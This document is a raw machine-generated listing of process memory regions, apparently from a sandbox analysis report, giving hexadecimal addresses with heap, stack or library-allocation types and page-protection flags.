22BB8169000
heap
page read and write
167CFE80000
heap
page execute and read and write
10DD7750000
trusted library allocation
page read and write
267C3E92000
heap
page read and write
29F2000
trusted library allocation
page read and write
17A713FC000
heap
page read and write
167CFD73000
heap
page read and write
8790000
trusted library allocation
page read and write
1EC01B62000
trusted library allocation
page read and write
5A5E000
trusted library allocation
page read and write
2CE0FB000
stack
page read and write
1B8A9D31000
heap
page read and write
10DE748B000
trusted library allocation
page read and write
5835000
trusted library allocation
page read and write
8D1D000
stack
page read and write
CF7000
stack
page read and write
5825000
trusted library allocation
page read and write
BE1130C000
stack
page read and write
3BEE9FF000
stack
page read and write
10DD58D3000
trusted library allocation
page read and write
167D17CA000
trusted library allocation
page read and write
1B8ADCCF000
trusted library allocation
page read and write
1EC2A197000
heap
page read and write
1B8C59C3000
heap
page read and write
1B8A9C60000
heap
page read and write
1B8C565F000
heap
page read and write
7FFD9B9F8000
trusted library allocation
page read and write
1B8C6D01000
heap
page read and write
1B8BD240000
trusted library allocation
page read and write
167D190F000
trusted library allocation
page read and write
29FB000
trusted library allocation
page execute and read and write
2DB4000
trusted library allocation
page read and write
87B0000
trusted library allocation
page read and write
6240000
trusted library allocation
page read and write
1B8C5C1D000
heap
page read and write
10DD763D000
trusted library allocation
page read and write
2CE3FD000
stack
page read and write
8B9D000
stack
page read and write
10DEFD3E000
heap
page read and write
1B8BD176000
trusted library allocation
page read and write
1EC01A2E000
trusted library allocation
page read and write
1EC019CD000
trusted library allocation
page read and write
B98CB8C000
stack
page read and write
F8D000
heap
page read and write
1EC019CF000
trusted library allocation
page read and write
1B8ADCAB000
trusted library allocation
page read and write
7FFD9B88B000
trusted library allocation
page execute and read and write
1B8C638D000
heap
page read and write
17A72E80000
heap
page read and write
62BE000
trusted library allocation
page read and write
7AD0000
trusted library allocation
page read and write
75DE000
stack
page read and write
10DD85A6000
trusted library allocation
page read and write
77F0000
heap
page read and write
10DEFD66000
heap
page read and write
267C3F80000
heap
page read and write
1B8C46D5000
heap
page read and write
8834000
heap
page read and write
167CFFB5000
heap
page read and write
167D177B000
trusted library allocation
page read and write
1EC2A0C0000
heap
page read and write
1B8BCF72000
trusted library allocation
page read and write
9D8000
stack
page read and write
621C000
stack
page read and write
1B8C4947000
heap
page read and write
17A71630000
heap
page read and write
2B80000
trusted library allocation
page execute and read and write
10DD84FD000
trusted library allocation
page read and write
7FFD9BA40000
trusted library allocation
page execute and read and write
1B8C44EB000
heap
page read and write
10DE7511000
trusted library allocation
page read and write
167CFD8C000
heap
page read and write
7FFD9B890000
trusted library allocation
page read and write
4A63000
trusted library allocation
page execute and read and write
167D187D000
trusted library allocation
page read and write
1B8ADCE3000
trusted library allocation
page read and write
1B8C5724000
heap
page read and write
1EC01ACD000
trusted library allocation
page read and write
1B8AB940000
heap
page execute and read and write
50DE000
stack
page read and write
167CFFB0000
heap
page read and write
3BEEFF9000
stack
page read and write
10DD768C000
trusted library allocation
page read and write
10DD762D000
trusted library allocation
page read and write
1B8BCF82000
trusted library allocation
page read and write
1E6C5A75000
heap
page read and write
1B8C46F5000
heap
page read and write
EF7000
heap
page read and write
10DE756D000
trusted library allocation
page read and write
4F50000
trusted library allocation
page execute and read and write
1B8BD81D000
trusted library allocation
page read and write
1B8C4837000
heap
page read and write
56DE000
stack
page read and write
22D31345000
heap
page read and write
1B8C66ED000
heap
page read and write
1B8C6101000
heap
page read and write
1B8C69E5000
heap
page read and write
531AEFE000
stack
page read and write
17A713D7000
heap
page read and write
14CAAFA0000
heap
page read and write
1EC01A2A000
trusted library allocation
page read and write
7FFD9B8CC000
trusted library allocation
page execute and read and write
7FFD9B864000
trusted library allocation
page read and write
1EC019E0000
trusted library allocation
page read and write
10DE7B6F000
trusted library allocation
page read and write
1B8C4420000
heap
page read and write
22D313CC000
heap
page read and write
19B798A0000
trusted library allocation
page read and write
2BC6000
trusted library allocation
page read and write
14CAB180000
heap
page read and write
19B79934000
heap
page read and write
7FFD9B92C000
trusted library allocation
page execute and read and write
303E000
stack
page read and write
7AA0000
trusted library allocation
page read and write
7FFD9B8DC000
trusted library allocation
page execute and read and write
7A20000
trusted library allocation
page read and write
167D1787000
trusted library allocation
page read and write
233B5D40000
heap
page read and write
2D21000
trusted library allocation
page read and write
7BFF000
stack
page read and write
729E000
stack
page read and write
10DE7E85000
trusted library allocation
page read and write
7DC96FE000
unkown
page read and write
10DE7494000
trusted library allocation
page read and write
120E000
stack
page read and write
1BE47790000
heap
page read and write
1B8C5766000
heap
page read and write
8637000
trusted library allocation
page read and write
7FFD9B86D000
trusted library allocation
page execute and read and write
10DD7AD8000
trusted library allocation
page read and write
10DD7630000
trusted library allocation
page read and write
1B8C5409000
heap
page read and write
8935000
heap
page read and write
62C6000
trusted library allocation
page read and write
EE7CFAF000
stack
page read and write
10DD75A6000
trusted library allocation
page read and write
3260000
heap
page read and write
1B8C61A7000
heap
page read and write
1B8ADCF8000
trusted library allocation
page read and write
10DD57B6000
heap
page read and write
1B8C44E8000
heap
page read and write
1E6C5830000
heap
page read and write
1B8C6753000
heap
page read and write
1EC019C5000
trusted library allocation
page read and write
1EC01B7E000
trusted library allocation
page read and write
1B8BCFAA000
trusted library allocation
page read and write
10DE762F000
trusted library allocation
page read and write
1B8A9D2D000
heap
page read and write
531A6FC000
stack
page read and write
1B8ADCDF000
trusted library allocation
page read and write
10DE8C8C000
trusted library allocation
page read and write
1EC019D3000
trusted library allocation
page read and write
8838000
heap
page read and write
6242000
trusted library allocation
page read and write
1B8C536C000
heap
page read and write
6C2E000
stack
page read and write
10DE7BCA000
trusted library allocation
page read and write
10DE8C4C000
trusted library allocation
page read and write
4B10000
heap
page execute and read and write
1B8BD817000
trusted library allocation
page read and write
ECE000
stack
page read and write
10DE7BBC000
trusted library allocation
page read and write
7FFD9B940000
trusted library allocation
page execute and read and write
8931000
heap
page read and write
1B8C64D5000
heap
page read and write
531A1F9000
stack
page read and write
8640000
trusted library allocation
page read and write
1B8C6FC4000
heap
page read and write
17A714CD000
heap
page read and write
78F0000
trusted library allocation
page read and write
1F995EB2000
unkown
page readonly
7FFD9B850000
trusted library allocation
page read and write
10DD754E000
trusted library allocation
page read and write
4A80000
trusted library allocation
page read and write
7FFD9B870000
trusted library allocation
page read and write
7FFD9B87D000
trusted library allocation
page execute and read and write
10DE7647000
trusted library allocation
page read and write
10DE9321000
trusted library allocation
page read and write
1B8AB9DC000
trusted library allocation
page read and write
7A60000
trusted library allocation
page read and write
1B8C4D06000
heap
page read and write
1B8C5DEF000
heap
page read and write
1B8BD8FE000
trusted library allocation
page read and write
10DEFDAE000
heap
page read and write
167D1790000
trusted library allocation
page read and write
10DE7BFD000
trusted library allocation
page read and write
1B8A9D61000
heap
page read and write
10DE7F85000
trusted library allocation
page read and write
E36A2CC000
stack
page read and write
10DE748E000
trusted library allocation
page read and write
2D90000
heap
page read and write
10DE8BDC000
trusted library allocation
page read and write
1EC01A12000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
29260980000
heap
page read and write
2CDCFD000
stack
page read and write
2CD2FF000
stack
page read and write
1B8C6B31000
heap
page read and write
2CE2FC000
stack
page read and write
10DD755D000
trusted library allocation
page read and write
1B8C4639000
heap
page read and write
7FFD9B9F2000
trusted library allocation
page read and write
1B8BCFD5000
trusted library allocation
page read and write
10DD77A0000
trusted library allocation
page read and write
1B8AB740000
heap
page read and write
2D90000
trusted library allocation
page read and write
10DD753D000
trusted library allocation
page read and write
1B8BD0B3000
trusted library allocation
page read and write
5099000
stack
page read and write
674F000
stack
page read and write
6600000
trusted library allocation
page read and write
10DD5758000
heap
page read and write
1E6C5810000
heap
page read and write
1EC7F298000
heap
page read and write
C7A0FF000
stack
page read and write
4B60000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1B8C43BF000
heap
page read and write
1BE49085000
heap
page read and write
88E8000
heap
page read and write
10DE749D000
trusted library allocation
page read and write
1B8C68DB000
heap
page read and write
1B8AB8E4000
heap
page read and write
1B8ADC93000
trusted library allocation
page read and write
6D2E000
stack
page read and write
1B8ADCC1000
trusted library allocation
page read and write
E36A3CF000
stack
page read and write
22D31300000
heap
page read and write
4A8A000
trusted library allocation
page execute and read and write
2926086D000
heap
page read and write
1B8C5875000
heap
page read and write
10DD7480000
trusted library allocation
page read and write
2267C220000
heap
page read and write
1F9960DD000
heap
page read and write
58EC000
trusted library allocation
page read and write
1B8BCF7F000
trusted library allocation
page read and write
3BEE5DD000
stack
page read and write
1B8BD084000
trusted library allocation
page read and write
29F0000
trusted library allocation
page read and write
3BEF1F5000
stack
page read and write
17A71510000
heap
page read and write
10DD5848000
heap
page read and write
2D9E000
trusted library allocation
page read and write
7FFD9B900000
trusted library allocation
page read and write
1B8C4A91000
heap
page read and write
10DD732C000
heap
page read and write
1B8ADCDD000
trusted library allocation
page read and write
4A60000
trusted library allocation
page read and write
10DE7DC5000
trusted library allocation
page read and write
1B8C6F3C000
heap
page read and write
6810000
heap
page read and write
1B8C6251000
heap
page read and write
7FFD9B88D000
trusted library allocation
page execute and read and write
10DE7E05000
trusted library allocation
page read and write
77B0000
trusted library allocation
page read and write
1B8C61C9000
heap
page read and write
167D178C000
trusted library allocation
page read and write
4A79000
trusted library allocation
page read and write
10DD74EC000
trusted library allocation
page read and write
22D313D0000
heap
page read and write
1EC2A19A000
heap
page read and write
10DD75B4000
trusted library allocation
page read and write
1B8BCFED000
trusted library allocation
page read and write
167D1912000
trusted library allocation
page read and write
1F99609C000
heap
page read and write
2267C3A0000
heap
page read and write
22BB815A000
heap
page read and write
10DD767B000
trusted library allocation
page read and write
1F997F99000
trusted library allocation
page read and write
1B8ADCE7000
trusted library allocation
page read and write
10DE815A000
trusted library allocation
page read and write
167D1900000
trusted library allocation
page read and write
8923000
heap
page read and write
10DE8CE1000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
1B8C602C000
heap
page read and write
1B8C5A37000
heap
page read and write
F51000
heap
page read and write
1EC01A1A000
trusted library allocation
page read and write
10DD7826000
trusted library allocation
page read and write
17A73080000
heap
page execute and read and write
167CFEE0000
heap
page execute and read and write
3070000
heap
page read and write
7FFD9BA30000
trusted library allocation
page execute and read and write
1B8C4D6A000
heap
page read and write
1B8BD26B000
trusted library allocation
page read and write
7FFD9B936000
trusted library allocation
page execute and read and write
14CAAFBA000
heap
page read and write
1B8C5E73000
heap
page read and write
1EC01B71000
trusted library allocation
page read and write
1EC01A32000
trusted library allocation
page read and write
1B8BD281000
trusted library allocation
page read and write
1EC019F7000
trusted library allocation
page read and write
1B8C5257000
heap
page read and write
1BE475A0000
heap
page read and write
10DE8BD4000
trusted library allocation
page read and write
2BBE000
trusted library allocation
page read and write
19B79830000
heap
page read and write
1EC01A1E000
trusted library allocation
page read and write
1B8BD819000
trusted library allocation
page read and write
1B8BCFEF000
trusted library allocation
page read and write
17A71550000
trusted library allocation
page read and write
10DE763F000
trusted library allocation
page read and write
10DE8E16000
trusted library allocation
page read and write
1B8AB9E2000
trusted library allocation
page read and write
1B8C5A15000
heap
page read and write
1F996325000
heap
page read and write
10DD76A3000
trusted library allocation
page read and write
1B8C4C40000
heap
page read and write
29E2000
trusted library allocation
page read and write
1EC01B5F000
trusted library allocation
page read and write
2CD6FE000
stack
page read and write
10DE8D76000
trusted library allocation
page read and write
55E6000
trusted library allocation
page read and write
17A73050000
heap
page read and write
167D17E5000
trusted library allocation
page read and write
8800000
trusted library allocation
page execute and read and write
7A40000
trusted library allocation
page read and write
19B79820000
heap
page read and write
85A489C000
stack
page read and write
891F000
heap
page read and write
10DD7618000
trusted library allocation
page read and write
7FFD9B906000
trusted library allocation
page read and write
10DD757D000
trusted library allocation
page read and write
22D3139B000
heap
page read and write
10DD8593000
trusted library allocation
page read and write
7FFD9BA30000
trusted library allocation
page read and write
7FFD9B87B000
trusted library allocation
page execute and read and write
29EA000
trusted library allocation
page execute and read and write
1EC01A8D000
trusted library allocation
page read and write
1B8BD1AB000
trusted library allocation
page read and write
10DD8547000
trusted library allocation
page read and write
53198ED000
stack
page read and write
7FFD9B843000
trusted library allocation
page execute and read and write
2267C2CB000
heap
page read and write
531A9FD000
stack
page read and write
1B8ADCB5000
trusted library allocation
page read and write
725E000
stack
page read and write
267C3E9B000
heap
page read and write
2DA7000
trusted library allocation
page read and write
1EC01A03000
trusted library allocation
page read and write
1EC01B50000
trusted library allocation
page read and write
1B8ADC69000
trusted library allocation
page read and write
10DE7B39000
trusted library allocation
page read and write
7FFD9BA08000
trusted library allocation
page read and write
1B8BCF64000
trusted library allocation
page read and write
10DE7597000
trusted library allocation
page read and write
7FFD9B863000
trusted library allocation
page read and write
2267C2A0000
heap
page read and write
7FFD9B854000
trusted library allocation
page read and write
167D17F4000
trusted library allocation
page read and write
2CE1FB000
stack
page read and write
7FFD9B930000
trusted library allocation
page execute and read and write
1B8ADCE9000
trusted library allocation
page read and write
1B8C6C19000
heap
page read and write
1B8C42B4000
heap
page read and write
1F997F97000
trusted library allocation
page read and write
10DD7659000
trusted library allocation
page read and write
7FFD9B850000
trusted library allocation
page read and write
1B8ADCAD000
trusted library allocation
page read and write
1B8A9CF0000
heap
page read and write
1B8C63AF000
heap
page read and write
562E000
stack
page read and write
7FFD9B874000
trusted library allocation
page read and write
7FFD9B852000
trusted library allocation
page read and write
10DEFD48000
heap
page read and write
73DE000
stack
page read and write
1B8ADCD7000
trusted library allocation
page read and write
22D312E0000
heap
page read and write
1B8ADC85000
trusted library allocation
page read and write
167D1783000
trusted library allocation
page read and write
1F9960E0000
heap
page read and write
874E000
stack
page read and write
7FFD9B910000
trusted library allocation
page execute and read and write
10DE8D81000
trusted library allocation
page read and write
2CDAFB000
stack
page read and write
7FFD9B850000
trusted library allocation
page read and write
4F43BFF000
unkown
page read and write
10DD764B000
trusted library allocation
page read and write
5266000
trusted library allocation
page read and write
1F997F93000
trusted library allocation
page read and write
1EC019F3000
trusted library allocation
page read and write
17A71570000
trusted library allocation
page read and write
1B8C4309000
heap
page read and write
10DE7B57000
trusted library allocation
page read and write
10DD850E000
trusted library allocation
page read and write
F1E000
heap
page read and write
10DE8C56000
trusted library allocation
page read and write
2B6C000
stack
page read and write
1E6C5882000
heap
page read and write
22BB8350000
heap
page read and write
5100000
heap
page read and write
7B40000
trusted library allocation
page read and write
10DD5930000
heap
page read and write
799E000
stack
page read and write
1B8C5380000
heap
page read and write
1B8BD848000
trusted library allocation
page read and write
878C000
stack
page read and write
30ACBFC000
stack
page read and write
10DD7606000
trusted library allocation
page read and write
167CFE16000
heap
page read and write
1B8C6981000
heap
page read and write
7FFD9B872000
trusted library allocation
page read and write
1EC7F240000
heap
page read and write
1B8BD85E000
trusted library allocation
page read and write
10DD5750000
heap
page read and write
1B8BD856000
trusted library allocation
page read and write
1EC7F2BE000
heap
page read and write
10DE8CEC000
trusted library allocation
page read and write
7A1D000
stack
page read and write
7A30000
trusted library allocation
page read and write
2B20000
heap
page execute and read and write
5320000
heap
page execute and read and write
1B8C5160000
heap
page read and write
C79FFF000
stack
page read and write
1B8C44F1000
heap
page read and write
2ABCB0D0000
heap
page read and write
21371410000
heap
page read and write
1B8C66AB000
heap
page read and write
1B8ADCC5000
trusted library allocation
page read and write
1B8BCF69000
trusted library allocation
page read and write
1EC019B7000
trusted library allocation
page read and write
2BF0000
trusted library allocation
page read and write
516E000
trusted library allocation
page read and write
1F997C20000
heap
page read and write
267C3EC1000
heap
page read and write
7FFD9B8AD000
trusted library allocation
page execute and read and write
2CCCFD000
stack
page read and write
1B8A9B40000
heap
page read and write
8824000
heap
page read and write
C7A3FB000
stack
page read and write
167CFC70000
heap
page read and write
4F43CFF000
stack
page read and write
531ABFB000
stack
page read and write
1B8BB960000
trusted library allocation
page read and write
15F677F000
stack
page read and write
721B000
stack
page read and write
10DD854A000
trusted library allocation
page read and write
233B5D4A000
heap
page read and write
531AFFA000
stack
page read and write
1B8C4617000
heap
page read and write
10DEFD37000
heap
page read and write
7FFD9B920000
trusted library allocation
page read and write
65F0000
trusted library allocation
page read and write
2BA0000
trusted library allocation
page read and write
10DD7765000
trusted library allocation
page read and write
3048000
heap
page read and write
10DD5831000
heap
page read and write
1B8ADC77000
trusted library allocation
page read and write
1B8BD0A4000
trusted library allocation
page read and write
167D1767000
trusted library allocation
page read and write
5E5E000
stack
page read and write
1B8BD850000
trusted library allocation
page read and write
10DE760F000
trusted library allocation
page read and write
1B8A9DF3000
trusted library allocation
page read and write
10DD583F000
heap
page read and write
946000
unkown
page readonly
10DD77BB000
trusted library allocation
page read and write
2CD4FE000
stack
page read and write
7FFD9B89C000
trusted library allocation
page execute and read and write
10DE7C24000
trusted library allocation
page read and write
10DEFDB6000
heap
page read and write
167CFD7E000
heap
page read and write
1B8BCF5D000
trusted library allocation
page read and write
2267C2C3000
heap
page read and write
30ACAFF000
stack
page read and write
2926087F000
heap
page read and write
1B8C69C3000
heap
page read and write
1B8C4BD1000
heap
page read and write
7B30000
trusted library allocation
page execute and read and write
22BB8348000
heap
page read and write
10DE7AE9000
trusted library allocation
page read and write
1B8BD1A1000
trusted library allocation
page read and write
3D21000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
10DE7B47000
trusted library allocation
page read and write
10DD85A4000
trusted library allocation
page read and write
88DF000
heap
page read and write
10DD7465000
trusted library allocation
page read and write
1B8BD161000
trusted library allocation
page read and write
7FFD9BA28000
trusted library allocation
page read and write
1B8C5833000
heap
page read and write
7FFD9B916000
trusted library allocation
page read and write
10DE8B78000
trusted library allocation
page read and write
1B8ADCA3000
trusted library allocation
page read and write
6250000
trusted library allocation
page execute and read and write
1B8BCF6F000
trusted library allocation
page read and write
6F850F5000
stack
page read and write
10DD8570000
trusted library allocation
page read and write
1B8C6835000
heap
page read and write
7FFD9B930000
trusted library allocation
page read and write
1B8C4C13000
heap
page read and write
22BB8147000
heap
page read and write
1B8AB75C000
heap
page read and write
1B8C6DC9000
heap
page read and write
17A001A3000
trusted library allocation
page read and write
10DE8B5F000
trusted library allocation
page read and write
1B8A9D5B000
heap
page read and write
1B8BD1D6000
trusted library allocation
page read and write
213714AC000
heap
page read and write
167CFB90000
heap
page read and write
2267C2AD000
heap
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1EC019DC000
trusted library allocation
page read and write
7FFD9B910000
trusted library allocation
page read and write
10DE7BCD000
trusted library allocation
page read and write
2886CFE000
stack
page read and write
4A90000
trusted library allocation
page read and write
1B8C5A84000
heap
page read and write
7FFD9B8AB000
trusted library allocation
page execute and read and write
10DD75B8000
trusted library allocation
page read and write
895F000
heap
page read and write
1B8BD81F000
trusted library allocation
page read and write
10DE7D5A000
trusted library allocation
page read and write
10DD5935000
heap
page read and write
1B8C6DA7000
heap
page read and write
10DE8B8D000
trusted library allocation
page read and write
1B8BD0C3000
trusted library allocation
page read and write
1B8BCFBA000
trusted library allocation
page read and write
10DE8D8C000
trusted library allocation
page read and write
1B8ADC87000
trusted library allocation
page read and write
7FFD9BA20000
trusted library allocation
page read and write
10DD7811000
trusted library allocation
page read and write
1E6C5881000
heap
page read and write
10DD768A000
trusted library allocation
page read and write
1B8A9C90000
heap
page read and write
2D96000
trusted library allocation
page read and write
10DD75B1000
trusted library allocation
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
8998000
heap
page read and write
1B8C43F9000
heap
page read and write
1B8AC3E2000
trusted library allocation
page read and write
2DC6000
heap
page read and write
1B8BD28B000
trusted library allocation
page read and write
2B00000
heap
page read and write
10DD73F1000
trusted library allocation
page read and write
167CFD75000
heap
page read and write
1F9960AF000
heap
page read and write
1B8C6BD7000
heap
page read and write
1B8BCF77000
trusted library allocation
page read and write
1F9960A2000
heap
page read and write
17A001AF000
trusted library allocation
page read and write
19B79860000
heap
page read and write
10DE7587000
trusted library allocation
page read and write
892F000
heap
page read and write
3BEF2FE000
stack
page read and write
7A50000
trusted library allocation
page read and write
10DE8BB2000
trusted library allocation
page read and write
19B79923000
heap
page read and write
233B5D10000
heap
page read and write
1B8C41A3000
heap
page read and write
4B5F000
stack
page read and write
882C000
heap
page read and write
8670000
trusted library allocation
page read and write
8810000
heap
page read and write
1E6C5857000
heap
page read and write
C7A2FA000
stack
page read and write
1B8BD821000
trusted library allocation
page read and write
29C4000
trusted library allocation
page read and write
1B8C63CD000
heap
page read and write
EE7D5FF000
stack
page read and write
1B8BD0AB000
trusted library allocation
page read and write
267C4060000
heap
page read and write
10DD85BE000
trusted library allocation
page read and write
29260A55000
heap
page read and write
10DE7B67000
trusted library allocation
page read and write
7FFD9B853000
trusted library allocation
page read and write
19B79964000
heap
page read and write
10DE757F000
trusted library allocation
page read and write
1B8C4692000
heap
page read and write
1B8AB9D5000
trusted library allocation
page read and write
1B8BD0CD000
trusted library allocation
page read and write
30AD1FB000
stack
page read and write
7FFD9B870000
trusted library allocation
page read and write
22BB817E000
heap
page read and write
10DE7518000
trusted library allocation
page read and write
10DE8D96000
trusted library allocation
page read and write
10DD8628000
trusted library allocation
page read and write
7FFD9B860000
trusted library allocation
page read and write
7FFD9B87D000
trusted library allocation
page execute and read and write
1B8BD1CB000
trusted library allocation
page read and write
22BB80F0000
heap
page read and write
1B8ADCB9000
trusted library allocation
page read and write
4F95000
heap
page execute and read and write
267C4080000
heap
page read and write
10DEFCF0000
heap
page read and write
1B8ADC73000
trusted library allocation
page read and write
10DE7B59000
trusted library allocation
page read and write
10DE749B000
trusted library allocation
page read and write
1B8C4640000
heap
page read and write
2886BFE000
stack
page read and write
5319CFF000
stack
page read and write
65E0000
heap
page execute and read and write
1B8C6F5E000
heap
page read and write
28874FE000
stack
page read and write
71DD000
stack
page read and write
10DD5920000
trusted library allocation
page read and write
1B8C6584000
heap
page read and write
1EC7F2F6000
heap
page read and write
1B8C6F80000
heap
page read and write
10DD764D000
trusted library allocation
page read and write
6F8511E000
stack
page read and write
1F99609A000
heap
page read and write
1B8ADC95000
trusted library allocation
page read and write
7FFD9B853000
trusted library allocation
page execute and read and write
795E000
stack
page read and write
1B8C41D1000
heap
page read and write
1B8C49CB000
heap
page read and write
1B8C4AD5000
heap
page read and write
1BE475A8000
heap
page read and write
19B7998A000
heap
page read and write
4BBC000
stack
page read and write
7C5E000
stack
page read and write
1B8BD030000
trusted library allocation
page read and write
167CFD58000
heap
page read and write
10DD8574000
trusted library allocation
page read and write
7FFD9BA00000
trusted library allocation
page read and write
32AE000
stack
page read and write
7FFD9BA15000
trusted library allocation
page read and write
EE7CFC6000
stack
page read and write
17A71580000
trusted library allocation
page read and write
1B8C47BF000
heap
page read and write
1B8C5921000
heap
page read and write
12FC27E000
stack
page read and write
7847000
heap
page read and write
1B8ADC7F000
trusted library allocation
page read and write
1F995ED0000
unkown
page readonly
167D1761000
trusted library allocation
page read and write
C79DFE000
stack
page read and write
7FFD9BA20000
trusted library allocation
page read and write
1B8ADCF1000
trusted library allocation
page read and write
7B50000
trusted library allocation
page read and write
1B8ACDE2000
trusted library allocation
page read and write
2CD9FE000
stack
page read and write
7FFD9B8BC000
trusted library allocation
page execute and read and write
1EC1A2D0000
heap
page read and write
7FFD9B863000
trusted library allocation
page read and write
7FFD9BA50000
trusted library allocation
page read and write
7C9E000
stack
page read and write
10DEF420000
trusted library allocation
page read and write
167D17C6000
trusted library allocation
page read and write
6AED000
stack
page read and write
88F6000
heap
page read and write
7FFD9B8F6000
trusted library allocation
page read and write
1B8C5350000
heap
page read and write
167CFE24000
heap
page read and write
1B8C43F3000
heap
page read and write
1EC7F2CA000
heap
page read and write
51A43CE000
stack
page read and write
7FFD9B9F0000
trusted library allocation
page read and write
1EC017F0000
trusted library allocation
page read and write
10DD79EC000
trusted library allocation
page read and write
1B8BCF85000
trusted library allocation
page read and write
1B8C600A000
heap
page read and write
1B8C5943000
heap
page read and write
14CAB260000
heap
page read and write
4F90000
heap
page execute and read and write
22D313B3000
heap
page read and write
1B8C6070000
heap
page read and write
7FFD9B980000
trusted library allocation
page execute and read and write
1B8C5F5B000
heap
page read and write
10DE8BCE000
trusted library allocation
page read and write
7FFD9B84D000
trusted library allocation
page execute and read and write
10DD73C0000
heap
page read and write
1B8ADCF3000
trusted library allocation
page read and write
1B8C5B92000
heap
page read and write
10DD754A000
trusted library allocation
page read and write
7FFD9BA10000
trusted library allocation
page read and write
51A467F000
stack
page read and write
10DE8BC6000
trusted library allocation
page read and write
EE7CFB5000
stack
page read and write
56F0000
trusted library allocation
page read and write
167D17B7000
trusted library allocation
page read and write
22D31340000
heap
page read and write
10DE8B9A000
trusted library allocation
page read and write
1B8A9DF0000
trusted library allocation
page read and write
19B79C55000
heap
page read and write
28870FE000
stack
page read and write
1B8ADCB1000
trusted library allocation
page read and write
7FFD9B956000
trusted library allocation
page execute and read and write
1B8ADC71000
trusted library allocation
page read and write
10DD77E5000
trusted library allocation
page read and write
782F000
heap
page read and write
267C3EAC000
heap
page read and write
1B8ADCAF000
trusted library allocation
page read and write
10DD756B000
trusted library allocation
page read and write
7FFD9B893000
trusted library allocation
page read and write
7FFD9B9A0000
trusted library allocation
page execute and read and write
21371610000
heap
page read and write
10DE7C28000
trusted library allocation
page read and write
2267C2DC000
heap
page read and write
7FFD9B89D000
trusted library allocation
page execute and read and write
1B8C45D5000
heap
page read and write
7FFD9B9E8000
trusted library allocation
page read and write
7FFD9B87D000
trusted library allocation
page execute and read and write
2CD0FF000
stack
page read and write
10DE75BF000
trusted library allocation
page read and write
1B8C6EAE000
heap
page read and write
8886000
heap
page read and write
4B00000
heap
page readonly
10DD85A8000
trusted library allocation
page read and write
C79AEE000
stack
page read and write
10DD75BF000
trusted library allocation
page read and write
1B8ADCC3000
trusted library allocation
page read and write
2C00000
trusted library allocation
page read and write
1B8C415A000
heap
page read and write
1B8C43FF000
heap
page read and write
B98CEFE000
unkown
page read and write
10DE7AEC000
trusted library allocation
page read and write
22BB8145000
heap
page read and write
1B8BB951000
trusted library allocation
page read and write
1B8ADC89000
trusted library allocation
page read and write
307C000
heap
page read and write
7DC938C000
stack
page read and write
5829000
trusted library allocation
page read and write
22BB816A000
heap
page read and write
10DD85C1000
trusted library allocation
page read and write
1B8ADCED000
trusted library allocation
page read and write
1B8ADC8F000
trusted library allocation
page read and write
B98CFFF000
stack
page read and write
87D3000
trusted library allocation
page read and write
10DD759F000
trusted library allocation
page read and write
7FFD9B9FB000
trusted library allocation
page read and write
29260A50000
heap
page read and write
10DE7C80000
trusted library allocation
page read and write
10DE7B3B000
trusted library allocation
page read and write
1B8C3980000
trusted library allocation
page read and write
1B8C41AE000
heap
page read and write
167CFD10000
trusted library allocation
page read and write
1B8C5DA5000
heap
page read and write
1F997DE0000
heap
page execute and read and write
7FFD9B884000
trusted library allocation
page read and write
1F99615B000
heap
page read and write
63F0000
trusted library allocation
page read and write
167D17BB000
trusted library allocation
page read and write
10DE750B000
trusted library allocation
page read and write
658C000
stack
page read and write
1EC019FF000
trusted library allocation
page read and write
7F938000
trusted library allocation
page execute and read and write
85A499F000
stack
page read and write
2267C575000
heap
page read and write
1B8C5CA1000
heap
page read and write
17A001CC000
trusted library allocation
page read and write
1B8ADC6B000
trusted library allocation
page read and write
AB8B3FF000
unkown
page read and write
1EC7F590000
heap
page read and write
167D18E3000
trusted library allocation
page read and write
7FFD9B88D000
trusted library allocation
page execute and read and write
7FFD9B863000
trusted library allocation
page execute and read and write
10DD57B4000
heap
page read and write
1BE476B0000
heap
page read and write
167EA100000
heap
page read and write
1B8BCF5A000
trusted library allocation
page read and write
739A000
stack
page read and write
167D176F000
trusted library allocation
page read and write
10DD7632000
trusted library allocation
page read and write
7A90000
trusted library allocation
page read and write
22BB8354000
heap
page read and write
30AD3FE000
stack
page read and write
1B8C6273000
heap
page read and write
10DE8C96000
trusted library allocation
page read and write
1EC7F460000
heap
page read and write
E36A34E000
stack
page read and write
1B8BCF74000
trusted library allocation
page read and write
51A434C000
stack
page read and write
1B8C4650000
heap
page read and write
5323000
heap
page execute and read and write
10DEFDC0000
heap
page read and write
4B68000
trusted library allocation
page read and write
1B8C6CBF000
heap
page read and write
10DF0E3F000
heap
page read and write
1B8BD18B000
trusted library allocation
page read and write
17A71635000
heap
page read and write
1B8ADCE1000
trusted library allocation
page read and write
10DE7BB2000
trusted library allocation
page read and write
22BB8147000
heap
page read and write
1B8C6B0F000
heap
page read and write
67D0000
trusted library allocation
page read and write
1B8BD86F000
trusted library allocation
page read and write
10DE7BAF000
trusted library allocation
page read and write
7AB0000
trusted library allocation
page read and write
863A000
trusted library allocation
page read and write
10DD78E7000
trusted library allocation
page read and write
7900000
trusted library allocation
page execute and read and write
77D9000
heap
page read and write
29260821000
heap
page read and write
10DD756F000
trusted library allocation
page read and write
213714A7000
heap
page read and write
10DD5A40000
heap
page read and write
1F996320000
heap
page read and write
7FFD9B860000
trusted library allocation
page read and write
22BB817A000
heap
page read and write
7AC0000
trusted library allocation
page read and write
1B8C58D9000
heap
page read and write
1B8A9CFC000
heap
page read and write
10DE8BA1000
trusted library allocation
page read and write
1B8BCFD2000
trusted library allocation
page read and write
685B000
stack
page read and write
7FFD9BA2E000
trusted library allocation
page read and write
17A713FF000
heap
page read and write
10DE7B29000
trusted library allocation
page read and write
167D1781000
trusted library allocation
page read and write
1B8ADCD5000
trusted library allocation
page read and write
5914000
trusted library allocation
page read and write
1B8C6A8B000
heap
page read and write
1B8ADC9B000
trusted library allocation
page read and write
7FFD9B87B000
trusted library allocation
page execute and read and write
10DD75DB000
trusted library allocation
page read and write
22D31390000
heap
page read and write
1B8BD80B000
trusted library allocation
page read and write
17A714D0000
heap
page read and write
1B8C4573000
heap
page read and write
1B8C6C7D000
heap
page read and write
29C0000
trusted library allocation
page read and write
10DE80C5000
trusted library allocation
page read and write
7C00000
heap
page read and write
731A000
